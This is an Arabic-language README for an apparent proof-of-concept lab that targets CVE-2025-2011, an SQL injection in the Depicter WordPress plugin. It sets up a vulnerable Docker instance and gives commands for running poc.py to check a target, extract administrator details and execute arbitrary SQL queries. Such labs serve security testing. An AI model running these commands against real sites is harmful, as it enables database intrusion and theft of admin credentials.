
إثبات المفهوم لـ CVE-2025-2011 - حقن SQL في ملحق Depicter <= 3.6.1
مرجع CVE: CVE-2025-2011
يحتوي هذا المستودع على بيئة إثبات المفهوم لاختبار ثغرة حقن SQL في إضافة Depicter Slider & Popup Builder (الإصدارات الأقل من 3.6.2).
requests، coloramaتشغيل البيئة
docker-compose up -d
إكمال تثبيت ووردبريس
http://localhost:5555تثبيت الإضافة الضعيفة
chmod +x install-plugin.sh
./install-plugin.sh
سيقوم هذا السكريبت بـ:
تثبيت تبعيات بايثون
pip install requests colorama
يمكن استخدام سكريبت إثبات المفهوم (poc.py) لاختبار الثغرة في أوضاع مختلفة:
التحقق مما إذا كان الهدف ضعيفًا
python poc.py -u http://localhost:5555
استخراج تفاصيل المسؤول
python poc.py -u http://localhost:5555 -m admin
تنفيذ استعلام SQL مخصص
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
تفعيل إخراج التصحيح
python poc.py -u http://localhost:5555 -d
لإيقاف وإزالة البيئة:
docker-compose down -v
تم توفير هذه البيئة للأغراض التعليمية والاختبارية فقط. لا تستخدمها ضد أي أنظمة دون إذن صريح.